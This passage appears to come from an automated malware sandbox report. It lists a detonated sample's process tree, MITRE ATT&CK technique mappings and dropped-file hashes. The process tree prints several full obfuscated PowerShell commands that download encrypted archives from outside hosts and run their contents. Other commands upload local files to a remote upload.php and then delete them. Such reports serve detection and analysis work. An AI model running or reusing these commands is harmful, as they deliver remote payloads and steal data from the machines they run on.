  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'https://goosess.com/read/get.php?wc=iew&vf=lk0100';$KWnAhHWFxDer = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1868
- C:\Users\Public\documents\unzip.exe
  unzip.exe -o -P "a0" "C:\Users\Public\Documents\di3726.zip"
  2⤵
  - Executes dropped EXE
  PID:368
- C:\Windows\system32\timeout.exe
  timeout -t 5 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_down.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d1.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_docu.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d2.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_desk.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d3.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_sys.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d4.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=UMLCWGSL.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3992
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:3268
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=UMLCWGSL.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:3848
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
062ec97b6ef093bf6476e9fe73e900d2

SHA1
78f672ca2406dea8d47e233dd5f97fb5fc42053b

SHA256
1f8e7460d95be6fcb76f17890d5e6ceff73b584ced642a5b9eaab864c9662930

SHA512
